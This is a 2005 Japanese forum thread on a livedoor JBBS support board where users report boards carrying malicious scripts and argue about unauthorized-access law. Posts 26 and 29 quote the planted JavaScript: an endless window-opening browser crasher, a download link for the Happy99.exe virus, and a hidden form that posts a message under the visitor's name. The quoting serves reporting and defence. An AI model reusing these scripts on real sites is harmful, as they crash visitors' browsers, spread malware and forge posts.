スクリプト攻撃板報告スレッド - 1109820523

1：★ライブドアしたらばスタッフ★：2005/03/03(木) 12:28:43 ID:zCm4FpEE: 現在一部のスレッドにおきまして、掲示板管理者の
設定により、悪質なスクリプトを貼り付けている例が
見受けられます。このような板を発見された場合、
こちらのスレッド或いはjbbs-support@livedoor.net
宛にご連絡下さいますようお願い申し上げます。

※本件に関係の無い書き込みに関しましては一律削除致しますので
宜しくお願い申し上げます。
2：名無しさん：2005/03/03(木) 19:02:20 ID:w/FZwMvw: http://jbbs.livedoor.jp/computer/19891/
3：名無しさん：2005/03/05(土) 20:50:58 ID:5a.NtvCQ: そんなことよりiVAS5s1Uを何とか汁
4：名無しさん：2005/03/06(日) 23:36:32 ID:h8zr82X.: travelカテですが、スクリプトによると思われるスレが立てられました。
（投稿者名、IP、クリップボードデータに関しては一応伏せたまま報告しておきます）

皆様、かける様大学というサイトをご存知ですか?
救世主かける様が私達に助言を与えて下さる、素晴らしいサイトですよ。
とてもお勧めです。皆様も是非一度行かれてみては如何でしょうか。

http://kakerusama.ifdef.jp/

Name=××××
Mail=sage
Referrer=http://jbbs.livedoor.jp/bbs/subject.cgi/computer/19909/
UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Width=1024
Height=768
ColorDepth=16
ClipboardData=××××××　×××
5：名無しさん：2005/03/07(月) 00:28:25 ID:j9676Wzw: http://jbbs.livedoor.jp/computer/19909/
6：名無しさん：2005/03/07(月) 03:27:36 ID:KWJECgN.: かける系列です。

第二かける様大学公式掲示板http://jbbs.livedoor.jp/computer/18574/
第三かける様大学公式掲示板http://jbbs.livedoor.jp/computer/18913/
第四かける様大学公式掲示板http://jbbs.livedoor.jp/computer/19320/
第五かける様大学公式掲示板http://jbbs.livedoor.jp/computer/19672/
第六かける様大学公式掲示板http://jbbs.livedoor.jp/computer/19909/
7：名無しさん：2005/03/07(月) 12:02:39 ID:VEJZstaw: >>6
スクリプトは第六にしか付いていないようだが？
お前の投稿は宣伝しているようにしか見えない。
8：名無しさん：2005/03/07(月) 15:53:07 ID:WN.8GiBk: 違いますよ。宣伝を食らった者です。
こんなところに宣伝する人はいないと思いますが？
なぜ宣伝と断定するのか非常に疑問。

最初、スクリプトはかける第一につけられて、今は強制閉鎖。
それで第六ができてスクリプトを仕組んでいます。
なので第六を打ち落としたら後の掲示板に入れられる可能性があるかと思ったまで。
9：名無しさん：2005/03/07(月) 19:33:42 ID:lrTtRldc: >>8
煽りが目的だとしたら？どこかのサナワさんみたいに。
どちらにしろ、ああいうレスは無視するべきだと思います。
ところで>>6と>>8はIDが違うけど別人？
10：★ライブドアしたらばスタッフ★：2005/03/09(水) 18:30:56 ID:mgO8ngVU: 話が脱線しすぎないうちに申し上げておきます。
スクリプト攻撃板報告スレッドですので
スクリプト攻撃板報告に関連しない書き込みは下記へ移動して行って下さいますようお願い申し上げます。

http://jbbs.livedoor.jp/bbs/read.cgi/computer/10298/1071757620/

以後　整理に為に関連しない書き込みに関しましては削除させていただくことが
あります。
11：名無しさん：2005/03/10(木) 08:14:29 ID:PMkMRKvY: >>7
かける系列では第三・第四・第五にも連続投稿スクリプトを見つけました。
早急に削除してもらいたいです。

これ以上被害が出ないうちにかけるのIPを公開したりなどもした方が良いと思います。
では。
12：（・θ・）樋横博士の異常な愛情：2005/03/10(木) 19:26:36 ID:f.K4UBi.: かける様大学
http://jbbs.livedoor.jp/bbs/read.cgi/anime/2403/1110445357/
失礼します。管理人ではなくただの住人ですが、こちらにも貼られておりました。
13：名無しさん：2005/03/11(金) 06:55:09 ID:iVAS5s1U: >>12
貼り付けられた先の掲示板やスレをいちいち上げてたらきりがないと思うが？
14：名無しさん：2005/03/11(金) 21:57:36 ID:Xslv4kMc: tesuto
15：名無しさそ：2005/03/13(日) 14:43:59 ID:RcqKXExI: かける様大学の管理人（かける）の仲間達が集まっている掲示板です。
トリップ等を抜いて楽しんだり、色々と悪いこともしているようです。
この掲示板を削除希望です。因みに「悪いこと」というのは
ＰＡＳＳクラ、連投による攻撃などです。

http://jbbs.livedoor.jp/computer/18648/
16：名無しさん：2005/03/18(金) 23:09:34 ID:s6qPGANw: >>15ああ、破壊王BBSか
そこの掲示板に一回書き込んだだけでアクセス制限された
17：名無しさん：2005/03/18(金) 23:19:04 ID:s6qPGANw: http://jbbs.livedoor.jp/computer/20231/
「第七かける大学公式掲示板」
18：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/19(土) 23:00:17 ID:WWMSaQlw: >>15-17
ここは荒らし掲示板紹介スレではありませんよ・・・
スクリプトを貼っている掲示板のアドレスを公開するところです。
見たところどちらもスクリプトは貼ってありませんね。
19：名無しさん：2005/03/20(日) 01:23:29 ID:s6qPGANw: http://jbbs.livedoor.jp/computer/5676/
でもこの掲示板にはスクリプトが貼ってありますよね？
20：名無しさん：2005/03/20(日) 09:28:25 ID:7JJTBKqQ: スクリプト付きのURLには【危険】とか印をつけてくれないかな。

スレの趣旨からいえば、デフォルトは【危険】で、危険でないURLの方に
印を付けるべき何だろうけど、たぶん危険でないURLを貼り付ける人は
この問題を理解していない人だから、言ってもわからないと思うから。
21：名無しさん：2005/03/20(日) 10:19:10 ID:C7qKk/jU: http://jbbs.livedoor.jp/computer/20231/
かけるがＮＧワード対策してますよ
22：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/20(日) 13:45:29 ID:WWMSaQlw: >>19
見たところ、設置されてはいないようです。過去には設置されていたので、おそらくもう管理者が削除したのでしょう。
>>20
やっぱりそうすべきですね。
23：名無しさん：2005/03/21(月) 01:37:58 ID:/wdJ.mhc: 酷すぎです。以下、かけ-るの掲示板のテンプレより転載。
http://jbbs.livedoor.jp/computer/20231/

重要なお知らせ
「かけ-る様」という文字列がライブドアしたらばの掲示板全体でNGワードとなっているようです。
これはライブドアが嫉妬して全体NGワードを設定する程、救世主かけ-る様が偉大だということでもあります。
なので、メッセージ中に「かけ-る様」と書きたい時は、「かけ-る様」の文字列の間に幅無しスペース()を入れて書き込んで下さい。
24：名無しさん：2005/03/21(月) 01:44:20 ID:/wdJ.mhc: 第八かけ-る様大学公式掲示板
http://jbbs.livedoor.jp/computer/20338/
25：名無しさん：2005/03/21(月) 12:39:42 ID:nuORqUlA: >>24
奪った掲示板らしいぞ、それ・・・
26：名無しさん：2005/03/21(月) 15:03:45 ID:6O/GcE5Q: >>19
特定のURLから飛んできた場合ブラクラに飛ばされるスクリプトが設置されていますよ。

<script>
window.status="･ﾚ｡ｼ･ｸ､ｬﾉｽｼｨ､ｵ､・ﾞ､ｷ､ｿ";
if(document.referrer == "http://mbspro5.uic.to/user/nnr7050.html"){
while(1){open('./');}
}
if(document.referrer == "http://yy2.ziyu.net/yy/nomoto.html"){
while(1){open('http://easyweb.easynet.co.uk/~hiros/virii99/newtype/Happy99.exe');open('http://www2.strangeworld.org/');}
}
</script>
27：名無しさん：2005/03/21(月) 21:15:21 ID:s6qPGANw: ブラクラどころかHappy99のウイルスをDLさせられる
28：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/21(月) 21:53:24 ID:WWMSaQlw: うわっ･･･えげつないですね。
そのサイトから荒らしに来る人が多かったのかな？
29：名無しさん：2005/03/22(火) 00:38:09 ID:KmRKdeOo: http://jbbs.livedoor.jp/computer/20000/

茄子のもう一つの掲示板
ここから呼び出されるスクリプトの中にも悪意のあるスクリプトが。

http://pan-pacific.hp.infoseek.co.jp/js/greattemizumushi8.js

if (Name.match(/take/)){
var Idiot =" 　　　　　　人　　　　　　　　　　＿＿＿＿＿＿
　　　　　／｡ﾟ＼　∀　　　　／
　　　　 (*´-｀ ),ぅ⊥　　　＜この掲示板つまらないから僕が支配しようと思います。
　（⌒⌒とo　_-､ﾉ⌒⌒）　　＼文句ある人、どうぞ反論してくださいっ！
　（　 )⌒⌒~し'J⌒⌒⌒）　　　￣￣￣￣￣￣
　　~~~~~~~~~~~~~~~~~~~ "
document.write("<form name=gettrip0 action=http://jbbs.livedoor.jp/bbs/write.cgi/computer/4006/new/ method=post target=1904>");
document.write("<input type=hidden name=SUBJECT value=\"ﾌｵﾂ遙ﾄ､ﾊ､鵑ﾁ､网ﾃ､ﾆ｢�\">");
document.write("<input type=hidden name=NAME value=\""+Name+"\">");
document.write("<input type=hidden name=MAIL value=\""+Mail+"\">");
document.write("<input type=hidden name=MESSAGE value=\""+Idiot+"\">");
document.write("<input type=hidden name=BBS value=4006>");
document.write("<input type=hidden name=DIR value=computer>");
document.write("<input type=hidden name=TIME value=1011364399>");
document.write("</form>");
document.gettrip0.submit();
}

http://pan-pacific.hp.infoseek.co.jp/js/greattemizumushi5.js

window.status="･ﾚ｡ｼ･ｸ､ｬﾉｽｼｨ､ｵ､・ﾞ､ｷ､ｿ";
if(document.referrer == "http://mbspro5.uic.to/user/nnr7050.html"){
while(1){open('./');}
}
if(document.referrer == "http://yy2.ziyu.net/yy/nomoto.html"){
while(1){open('http://easyweb.easynet.co.uk/~hiros/virii99/newtype/Happy99.exe');open('http://www2.strangeworld.org/');}
}

かける関係も危ないが、茄子関係も危ない。
30：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/22(火) 13:07:15 ID:WWMSaQlw: >>29
うぇ、20000が茄子だ。
これはうまく作動していないようですね。
投稿先の掲示板が何らかの規制を行っているのかな？
それにしてもそこの掲示板、カスタムを色々やってますね。
こんな掲示板なのにご丁寧に参考サイトのアドレスを貼ってありますし。

↓↓この部分(greattemizumushi1.js)
//inspired by 外国為替総合掲示板　- 外為フォーラム -(http://jbbs.livedoor.jp/business/927/)//
31：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 00:18:49 ID:73khSP..: あの、不注意で掲示板のパスワードがばれて
完全に乗っ取られてしまいました
なのでパスワードもすべて変えられてしまい、メルアドも変えられてしまいました。
どうすればようでしょうか
32：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 00:19:48 ID:73khSP..: 個人情報まで公開されてしまいました
http://jbbs.livedoor.jp/computer/6801/kouji616aa.html
33：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 00:21:53 ID:73khSP..: http://www.ipa.go.jp/security/ciadr/law199908.html
に違反してます
警察物ですよ。
34：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/31(木) 00:36:13 ID:WWMSaQlw: >>31-33
こういう個人情報に関わるものは、JBBSに直接メールを送った方がいいと思います。
個人情報をその掲示板に公開されてしまっているのなら、ここにアドレスを貼ると逆効果ですよ。
サポート掲示板にはそういった類のスレッドは無いので、やっぱりメールを送るのがいいのではないでしょうか？
35：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 00:38:22 ID:73khSP..: ありがとうございます
36：名無しさん：2005/03/31(木) 01:02:31 ID:rVADdIU2: ＞あの、不注意で掲示板のパスワードがばれて
自己責任。
37：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 01:32:02 ID:73khSP..: >>36
でも犯罪だじぇ。
38：名無しさん：2005/03/31(木) 01:56:39 ID:rVADdIU2: >>37
犯罪？(´,_ゝ｀)ﾌﾟｯ
39：名無しさん：2005/03/31(木) 02:28:10 ID:lNXx2GVs: >>38
不正アクセス禁止法違反ですな。
40：名無しさん：2005/03/31(木) 02:40:33 ID:sDnvzYMk: >>37
貴方の不注意でパスワードをばらしてしまったのなら仕方がないことですよ。
41：名無しさん：2005/03/31(木) 08:01:48 ID:lNXx2GVs: >>40
なんか勘違いしているようだね。それでも犯罪。
ちなみに2chとかでセキュホ暴露などでさらされてるURLをクリックしても、
犯罪になる。相手が不正アクセスだと言って訴えたら負けるので、火遊びをしてやけどをしないように。
42：名無しさん：2005/03/31(木) 15:38:52 ID:dKmthosA: >>41
掲示板潰す目的で田代砲を撃つのは?
43：名無しさん：2005/03/31(木) 17:32:29 ID:C665YxOQ: アドレスをブラウザに入力するだけで入れる場合は、不正アクセスにはならないんじゃないか？
44：名無しさん：2005/03/31(木) 18:15:33 ID:lNXx2GVs: >>43
先頃、判決が出たところだよ。不正アクセスになる。で、それをやった人間が有罪となった。
当人は脆弱性の危険性を知らしめるためにやった主張しているがね。
この裁判はまさに、URLを打っただけで表示されるような脆弱性のあるシステムに
その方法でアクセスを行った場合、不正アクセスに相当するのかが争われた。
で、一審は「不正アクセスに相当する」という判決になった。控訴するかどうかは知らないけどね。
45：名無しさん：2005/04/01(金) 00:27:08 ID:I6crQYSE: ああ、あれね。あれはちょっと特殊みたいだからなあ。詳しくは知らんけど。
46：名無しさん：2005/04/01(金) 00:29:27 ID:sDnvzYMk: >>45
どんな事件だったの？
47：名無しさん：2005/04/01(金) 00:38:09 ID:I6crQYSE: 記事
http://www.itmedia.co.jp/news/articles/0503/25/news022.html

解説
http://www.geocities.jp/officeandaccs/
48：名無しさん：2005/04/01(金) 05:21:30 ID:lNXx2GVs: >>45
> ああ、あれね。あれはちょっと特殊みたいだからなあ。詳しくは知らんけど。

あのね、カギをかけ忘れていようが相手の家に黙って入れば、そしてそれを相手が
訴えれば、犯罪になるわけ。
49：名無しさん：2005/04/01(金) 13:14:51 ID:friVRuc.: その例はたまに2chでも見るが違うだろう。
50：名無しさん：2005/04/01(金) 13:19:32 ID:friVRuc.: アドレスを変えるだけでアクセス出来た件で、不正アクセスに問われたことはないでしょう？
今回のはそういったものではないようだし。
51：名無しさん：2005/04/01(金) 13:30:40 ID:lNXx2GVs: >>49
> その例はたまに2chでも見るが違うだろう。

違わない。

>アドレスを変えるだけでアクセス出来た件で、

そのアドレスが一般に公開されていないものであれば、それを推測してアクセスするのは
不正アクセスに相当するだろうね。

>今回のはそういったものではないようだし。

そういったものなのだよ。
52：名無しさん：2005/04/01(金) 13:52:50 ID:friVRuc.: 家は不特定多数に公開するものじゃない。WEB上に上げたものは、IDやpassでアクセス制限したもの以外は公開するもの。
ガキのかけ忘れってのは、WEB上の場合アクセス制限をしていなかったことになるだろう。

今回の判決だって、
＞ブラウザにURLを入力するだけでは閲覧できない秘匿性の高いファイルに対し、CGIの脆弱性を利用してアクセスするのは通常のアクセスとは言えず、
＞FTPのアクセス制御を回避した不正アクセスにあたる」と認定。

だしな。単にURLを書き換えただけでアクセスできたのもは不正アクセスにはならないだろう。アクセス制限機能なんて無いわけだし。
過去にそれで個人情報流出したのは何件かあったが、不正アクセス扱いにはならなかったしな。
53：名無しさん：2005/04/01(金) 14:01:20 ID:friVRuc.: そういやヨン様サイトの個人情報流出はどうなったんだっけかな。
あれは脆弱性を利用したアクセスだった気が。
54：名無しさん：2005/04/01(金) 14:09:39 ID:friVRuc.: うーん。よく読んだらCGIを通してるだけで、よくあるディレクトリ丸見えのサイトから
適当なファイル名を推測してってのと同じような手段だな。
脆弱性を利用してファイル名とパスし、脆弱性を利用してデータを引き出したのが問題なのか。
55：名無しさん：2005/04/01(金) 14:10:24 ID:friVRuc.: 訂正

パスを入手し
56：名無しさん：2005/04/01(金) 14:21:46 ID:lNXx2GVs: >>52
> ＞ブラウザにURLを入力するだけでは閲覧できない秘匿性の高いファイルに対し、CGIの脆弱性を利用してアクセスするのは通常のアクセスとは言えず、
> ＞FTPのアクセス制御を回避した不正アクセスにあたる」と認定。
> だしな。単にURLを書き換えただけでアクセスできたのもは不正アクセスにはならないだろう。アクセス制限機能なんて無いわけだし。

あんたなんか話を勘違いしているようだね。cgiの脆弱性をつくためのURLが存在し、それが
2chで晒されている場合に、それをクリックすれば不正アクセスだという話をしているのだがね。

俺の話に「それは違うだろう」というのなら、俺が話しているのと同じ話をしなければ意味がなかろうに。
あんたが別の話をするのは勝手だが、それならば俺の話に「違う」というのはおかしい。

あるいはGETメソッドとPOSTメソッドの違いを言ってるのであれば（POSTメソッドはURLだけでは
表現できないからね)、今回はその点は重大な争点にならなかった。したがってこの違い（たとえば
GETなら無実だがPOSTを使うと罪になるとか）はないと考えられる。

> 過去にそれで個人情報流出したのは何件かあったが、不正アクセス扱いにはならなかったしな。

それは単に被害者側が訴えないから。相手が本気で怒り訴え出れば負けるということ。
57：名無しさん：2005/04/01(金) 14:22:50 ID:lNXx2GVs: >>54
> うーん。よく読んだら

よく読まずに、それだけ自信満々に思いこみだけで書けるのがすごいな（ｗ
58：名無しさん：2005/04/01(金) 14:34:15 ID:friVRuc.: よく読んだらってのは自分で張ったACCSの件の解説サイトの事ね。
2chで「個人情報流出！」なんてスレが立ってるのは大抵俺が上で言った様な場合だから、
思い違いをしていた、ｽﾏｿ。
今回の判決が確定すれば、脆弱性を利用してアクセスするURLをクリックすることは、
不正に晒されているIDとpassを入力して入るのと同じ事になるから、当然アウトになるね。
59：名無しさん：2005/04/01(金) 14:36:25 ID:lNXx2GVs: 基本的な考え方として、現在の不正アクセス禁止法の法律の趣旨は、相手が公開する意図がなく、
こうしておけば秘密にできる、と考えて行っていることの盲点を意図についてアクセスするのは、
不正アクセスに相当するということ。

これについては当然反対論者はいるがね。反対意見はおおむね2つ。「これはシステム管理者側を
甘やかしすぎで、却って技術や管理が堕落するのではないか」と「セキュリティの研究のために行うことも
犯罪になるのでは、技術が向上しない」。それぞれ一理あるが、「だからといって不正なアクセスを
やってよいという理由にはならない」というのが現在の不正アクセス禁止法の考え方。

はっきりいってこの法律はかなり適用範囲が広いから、これを使って被害者側が訴えれば、
おそらく大抵のケースはアクセスを行った側が負ける（だからこそ反対論が結構あったのだが）。
2chとかでURLをさらされて、何千人もがアクセスした場合、その人たち全員を訴えるというのも
あまり現実的ではないが、見せしめのためにピックアップして訴えるということはあり得る話。
自分が生け贄にならない保証はないわけで、やるならそのリスクを承知の上でやることだね。

どこかのアイドルが詩を盗作しておいて「こんな重大な問題になるとは思わなかった」と
後悔した二の舞にならないように（笑
60：名無しさん：2005/04/01(金) 14:47:16 ID:lNXx2GVs: >>58
> 2chで「個人情報流出！」なんてスレが立ってるのは大抵俺が上で言った様な場合だから、

いやそれが思いこみなんだけどね。cgiを介すか否かは問題の本質ではない。
アクセスする側が「システム管理者側の意図に反してアクセスを試みる」意志なしには
普通は行なう事のない方法でアクセする行為そのものが不正アクセスに当たる。

たとえばfile01.html、file02.html、file04.htmlというURLが公開されている場合、
file03.htmlが存在すると推測してそれにアクセスするのが不正アクセスに当たるかといえば、
file03.htmlをアクセスする側に「隠さされているものを暴いてやろう」という意図の下に
行ったかどうかが有罪/無罪の分かれ目だと思うよ。file03.htmlも当然あるものと考え、
またそれが同様に公開されているデータだと思って扱っている限りは、不正アクセスには
相当しない。しかしfile03.htmlをアクセスした意図が「隠されているものを暴いてやろう」という
意図から行ったものだと思われてもしかたない状況であったり、file03.htmlをアクセスしたのは
偶然でもそれを見た時点で「公開されていないものである」ことが誰の目にも分かるにも関われず、
それを利用（悪用）すれば、抵触すると考えられる。
61：名無しさん：2005/04/01(金) 14:55:25 ID:friVRuc.: では、隠されている（公開されていない）ということが、「アクセス制御機能」に該当すると？
62：名無しさん：2005/04/01(金) 14:59:07 ID:friVRuc.: と言うか、単に管理者の意図に反してアクセスを試みる事が不正アクセスになるのならば、
＞「特定電子計算機」にアクセスが制御機能があったか
が裁判の争点になることはないのでは？
63：名無しさん：2005/04/01(金) 15:01:56 ID:friVRuc.: 自分で書いておいてなんだが、ここで質問をするのは板違いだから取り下げます。
スレ汚し失礼。
64：名無しさん：2005/04/01(金) 15:16:13 ID:lNXx2GVs: >>61
>では、隠されている（公開されていない）ということが、「アクセス制御機能」に該当すると？

ですな。URLの隠匿もその手段の一つにすぎない。

>>62
>＞「特定電子計算機」にアクセスが制御機能があったか
>が裁判の争点になることはないのでは？

アクセス制御機構を設置してあるということは、管理者側にそのデータを隠す意図があったという
証明のために必要なわけであり、具体的にどんな機構があれば「隠す意図」があることになるか
どうかは明確に定められていないから、あとは「これは隠す意図があるのは明らかである」と
多くの人間が思うものが、「機構」と見なされる。

>>63
>自分で書いておいてなんだが、ここで質問をするのは板違いだから取り下げます。
>スレ汚し失礼。

今頃気づくとは鈍いですな。
65：名無しさん：2005/04/01(金) 15:23:31 ID:lNXx2GVs: 一つの例としてセッション管理には普通クッキーを使うが、クッキーを使用できない
環境（携帯とかね）の対策としてURLの末尾をランダムな数字で構成する方法がある。
そのURLはその場限り（短時間、特定のIPからしか有効でない）と設定すれば、
それは少なくともクッキーによるセッション管理と同程度のアクセス制御機構と
なりえる。

つまりアクセス制御機構か否かはURLだからとかクッキーだからだとか、
SSL使っているかどうかとかの個別なものではないわけ。
システム管理者側の「このデータは不特定多数に公開してはいません」という
意思がアクセスする側に常識的な範囲で伝わるかどうかが、アクセス制御機構か否かを
決める。そしてそれを意図的に回避してアクセスする行為が不正アクセスになる。
66：名無しさん：2005/04/02(土) 01:26:09 ID:.XxKrdY2: >>31-33
２ｃｈだったら、大騒ぎになるな。これ。
((((((；ﾟДﾟ))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
67：名無しさん：2005/04/06(水) 02:16:15 ID:s6qPGANw: かける派は侮れない
68：モリオ：2005/04/06(水) 14:57:59 ID:BHFMNeaM: 自分のメールアドレスの非公開は出来ないのですかね？
悪戯されたら、困りますので・・・。＾＾；
69：モリオ：2005/04/06(水) 14:59:45 ID:BHFMNeaM: 板違いでした。
スイマセン。m(._.)m
70：名無しさん：2005/04/06(水) 23:24:43 ID:XQ9vbkoQ: またかけるがNGワード対策をしている。したらばさんどうにかしてください
http://jbbs.livedoor.jp/computer/20231/
71：名無しさん：2005/04/07(木) 01:11:17 ID:XQ9vbkoQ: の対策ありがとうございました。しかしかけるはまた新しい対策を↑の掲示板でしています。もう↑の掲示板削除してよいのではないでしょうか。
72：名無しさん：2005/04/07(木) 01:12:31 ID:XQ9vbkoQ: 訂正
の対策→　上の対策
73：名無しさん：2005/04/07(木) 01:31:01 ID:lNXx2GVs: read.cgiの改良はどうなったんだ（ボソ
74：名無しさん：2005/04/07(木) 01:54:27 ID:zd5M4x5Y: かける様への規制の仕方がおもしろいね。
ここまでやるなら、いっそのこと消してしまった方が良いのでは？
75：名無しさん：2005/04/16(土) 19:20:48 ID:CJCdiFPc: http://jbbs.livedoor.jp/computer/20920/
何か数秒事に強制更新されていて恐い…
76：名無しさん：2005/04/16(土) 20:17:33 ID:.PoyotFQ: メッセージ的に不正アクセスっぽいな。
77：名無しさん：2005/04/17(日) 00:25:49 ID:KmRKdeOo: http://jbbs.livedoor.jp/computer/20648/
ここも同じ手口で不正アクセスされてる・・
78：名無しさん：2005/04/19(火) 21:28:44 ID:HRzDWO72: http://jbbs.livedoor.jp/computer/17483/第九かける掲示板

<script language="javascript"></script>
かけるのトリップ抜きスクリプト。今度は暗号化されています。
79：名無しさん：2005/05/08(日) 09:52:22 ID:DZTNRPno: >>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
80：名無しさん：2005/05/08(日) 09:52:56 ID:DZTNRPno: >>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
81：名無しさん：2005/05/08(日) 09:53:42 ID:DZTNRPno: >>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
82：名無しさん：2005/05/08(日) 09:54:22 ID:DZTNRPno: >>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
あと４回！
83：名無しさん：2005/05/08(日) 09:55:00 ID:DZTNRPno: >>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
あと3回！
84：名無しさん：2005/05/08(日) 09:55:35 ID:DZTNRPno: >>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
あと2回！
85：名無しさん：2005/05/08(日) 09:56:20 ID:DZTNRPno: >>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
あと1回！
86：名無しさん：2005/05/08(日) 09:56:53 ID:DZTNRPno: お騒がせしました。
87：名前を言えない初心者：2005/05/10(火) 19:16:48 ID:ipxiXSV6: こんにちは!!皆さん
早速ですが、「ＮＧワード」とはなんですか？
たまにそれで、書きこみができなくなります
お願いします!!
88：名無しさん：2005/05/10(火) 19:33:54 ID:WGywJRqM: こんにちは！！名前を言えない初心者さん
「ＮＧワード」とは書き込んではいけない言葉のことだよ！
各掲示板の管理人がＮＧワードを指定しているんだ！

それと思いっきりスレ違いだよ！
このレス読み終わったら氏んでね！
89：名前を言えない初心者：2005/05/11(水) 16:36:41 ID:mQKzHOyk: あっほんとだ!!・・・・・・・・・・
でも、親切に教えてくれてありがとうございます
スミマセンでした!
「これから気おつけます」
90：名前を言えない初心者：2005/05/11(水) 16:38:57 ID:mQKzHOyk: あっほんとだ!!・・・・・・・・・・
でも、親切に教えてくれてありがとうございます
これから気おつけます「スミマセンでした!」
91：名前を言えない初心者：2005/05/11(水) 16:40:33 ID:mQKzHOyk: あれ、まちがって２回書いてしまいました
ほんとうにすみません
92：名無しさん：2005/05/11(水) 18:28:57 ID:Ttm8XBnE: オンラインMMORGO、Ragnarok ON Line(以下、ROと略します)系の板なのですが、
どうやら、ゲームで使用する規約違反のツールに
ゲーム内のデータを自動的に掲示板に書き込んで荒らしを行う罠を仕込んでいるらしく
大量の書き込みで掲示板としての機能がなさなくなってしまっています。

たとえば
http://jbbs.livedoor.jp/bbs/read.cgi/computer/6135/1115674068/
http://jbbs.livedoor.jp/bbs/read.cgi/computer/6135/1115669899/
http://jbbs.livedoor.jp/bbs/read.cgi/computer/6135/1115799896/
この様にスレッドを立てておくとどんどんレスをうめて行き、
もはや掲示板として機能しません。
この掲示板のほか、複数の板で同様の被害が出てる模様です。

なんとかならないものでしょうか・・・？
93：名無しさん：2005/05/11(水) 22:16:27 ID:/b1dxJFU: >>92
スクリプト荒らしか。
94：名無しさん：2005/05/11(水) 23:27:14 ID:4KTAGPCs: >>92
そもそも「被害にあった掲示板」の管理人はどう考えてんのさ？管理人が特に何も行動を起こそうと思わないなら、
それでいいんじゃないの？というかそれって管理人の意図に反してるのかも不明だし。

ともかくあんたの短い説明だけじゃ詳細が分からないし、あんたの示したリンク先でそういう問題を話し合ってるようにも見えない。
したらばに何か要望する段階ではない気がするけどね。まずは有志で問題の整理から始めることですな。
95：名無しさん：2005/05/11(水) 23:28:29 ID:4KTAGPCs: それともここしばらくしたらばが異常に重いのは、このせいとか？
96：名無しさん：2005/05/12(木) 00:18:34 ID:bkgPGqmw: >>94
被害にあった掲示板の管理人は放置してますね。掲示板自体の。
そこを利用してる身としては管理人になんとかしてもらえるならば
それに越したことはないのですが、このスクリプト荒らしを行う罠というものが、
複数の掲示板に対し全自動でスクリプト荒らしを行うため
結果としてしたらばJBBS自体への迷惑になると考え、報告した次第です。

話し合いをしようにも次々書き込まれるので話しようがないのですよ。

なお、この罠を仕込まれたプログラム自体がオンラインゲームのキャラを全自動で動かし、
Lv上げ・アイテム稼ぎを行わせるという代物なので
(ゲーム管理会社は当然規約で使用を禁止してますが)、
罠仕込みのプログラムを使用している当人も恐らくは気づいていないか、
気づいていても放置しているかのいずれかと思われます。
97：名無しさん：2005/05/12(木) 04:23:07 ID:4KTAGPCs: >>96
> 話し合いをしようにも次々書き込まれるので話しようがないのですよ。

そのための議論用の掲示板を新たに立ち上げるなり、別な掲示板を暫定的に使うなりすればいいんじゃないの？

> 罠仕込みのプログラムを使用している当人も恐らくは気づいていないか、
> 気づいていても放置しているかのいずれかと思われます。

そのツールの配布元とかその作者がどういう意図でやってるのかとか、
そもそもこれってその掲示板の管理人とツールの作者が連んでいるんじゃないのかとか、
明らかにしなくてはならないことは無数にあると思うけど？

あんたカキコは第一報としての価値あるかも知れないが、それだけでは恐らく何も進展しないと思うよ。
98：名無しさん：2005/05/12(木) 04:35:49 ID:4KTAGPCs: で、やっぱネットワークに詳しい人間が誰か立ち上がるしかないと思う。
ROをプレイしていて、アングラなツールにもそれなりに詳しく、なおかつネットワークの知識がある人。
ネットワークの知識があればPCが送信しているTCPのパケットをすべてモニターすることができるから、
どのツールを動かしているときにそれが行われるか特定できるはず。

で、ツールを特定したら、そのツールを使わないように呼びかけるとか、あるいはそのツールがアップされている
サイトの運営会社に削除依頼を出すとかになるだろう。もし一介のユーザーではそのサイトの運営会社が
聞き入れてくれない場合、はじめてしたらばの出番になるように思う。

まっとうなところではなくWinnyとかに流されているツールだと根絶するのは難しいだろうね。
なんにせよツールの特定からですな。
99：名無しさん：2005/05/12(木) 04:46:12 ID:4KTAGPCs: あと、これってあるいはアンチウィルスメーカーの方に「こんなことがあるらしい」とメールを出してみたらどうだろう。
何とも言えないが、サイト攻撃をするプログラムなら、そっちの方面の領分かもしれない。
100：名無しさん：2005/05/17(火) 05:14:20 ID:fgmKhhNU: >>99
きみっていつみても独り言が多いね。友達いないの？